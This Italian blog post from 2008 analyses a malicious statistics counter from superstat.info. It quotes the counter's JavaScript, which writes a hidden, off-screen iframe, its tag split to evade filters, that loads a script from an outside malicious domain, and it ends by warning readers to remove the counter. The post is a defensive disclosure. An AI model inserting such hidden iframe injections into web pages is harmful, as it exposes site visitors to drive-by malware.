Domenica avevo scritto a proposito dei troiani che cercavano di intrufolarsi sul mio povero PC mentre navigavo sulle pagine di splinder. Oggi pomeriggio, mentre guardavo che succedeva da Copiascolla, mi sono visto in diretta il troiano che voleva cambiare la mia homepage (come se io non usassi SpyBot e TeaTimer per bloccare simili richieste :-) ) Mi sono messo a dare un’occhiata a quale parte del codice inserisse il tutto: dopo avere benedetto il fatto che Firefox ti permette di scrivere view-source: e visualizzare il sorgente di una pagina web invece che la pagina stessa, ho scoperto che il colpevole era il contatore delle statistiche. Se uno guarda http://stat.superstat.info/counter.php, o almeno lo guardava quando ho provato io, avrebbe trovato questo simpatico pezzo di codice:
if ( parseInt(pr17) <= parseInt("9") && parseInt(visit17) < 2 ) {
document.write('<div style="position:absolute;left:-5000px;top:-5000px;visibility:hidden;">');
document.write('<if'+'rame frameborder="0" src="http://a1p.cgste2.won-ppp.info/htm/cc1.php?p=55&cc2=it"><'+'/iframe>' );
document.write('</div>');
};
Ho già detto che io JavaScript non lo parlo, ma credo che sia abbastanza chiaro che viene aperto un iframe che chiama appunto uno script su won-ppp.info. Ho provato a guardare le informazioni di whois per superstat.info, e ho visto che il dominio è “nascosto”, o meglio registrato da domainsbyproxy.com, che afferma di essere un utile servizio perché i dati pubblici dei dominii non siano preda di spammer ma a me sembra più un sistema perché non si sappiano i dati degli spammer. L’ultimo aggiornamento del record è dello scorso ottobre: visto che Gaia mi ha detto che quel contatore ce l’ha da almeno un anno, non penso sia impossibile che il dominio sia scaduto e sia stato preso da qualcuno che usi il servizio come copertura – sì, lo so, fa tanto James Bond o il negozio di fiori dei vecchi Alan Ford, ma che ci volete fare?
Vabbè, se non avete capito nulla del pippone non è importante, visto che quello che conta :-) è solo quest’ultima riga. Se avete un contatore su superstat.info, toglietelo subito.
Ultimo aggiornamento: 2008-03-26 15:51